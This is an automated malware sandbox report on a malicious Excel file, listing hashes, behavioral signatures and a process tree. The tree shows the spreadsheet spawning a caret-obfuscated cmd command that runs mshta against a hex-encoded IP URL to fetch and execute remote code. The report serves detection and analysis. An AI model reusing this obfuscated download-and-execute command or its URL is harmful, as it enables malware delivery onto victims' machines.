Analysis
-
max time kernel
139s -
max time network
141s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
19-01-2022 15:47
Behavioral task
behavioral1
Sample
edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878.xls
Resource
win10-en-20211208
General
-
Target
edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878.xls
-
Size
142KB
-
MD5
81f0a7a1ad8bf108c2648af767e77fcd
-
SHA1
9575d97617b4d5b9c22f5d2a0fbfbd3de1ad3de4
-
SHA256
edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878
-
SHA512
6ed134fd7cba8ddd3c195f5e31a1ce996b8bc5403933a47a23666b483720eb140ca7a8ba5fda71961ef5c7125e9a5b5575f60fb57d3c48879df75bb1980c5967
Malware Config
Extracted
http://0xb907d607/fer/fer.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2172 3152 cmd.exe 68 -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid Process 50 3280 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 3152 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid Process 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE 3152 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid Process procid_target PID 3152 wrote to memory of 3640 3152 EXCEL.EXE 72 PID 3152 wrote to memory of 3640 3152 EXCEL.EXE 72 PID 3152 wrote to memory of 2172 3152 EXCEL.EXE 73 PID 3152 wrote to memory of 2172 3152 EXCEL.EXE 73 PID 2172 wrote to memory of 3280 2172 cmd.exe 75 PID 2172 wrote to memory of 3280 2172 cmd.exe 75
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:3640
-
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fer.html3⤵
- Blocklisted process makes network request
PID:3280
-
-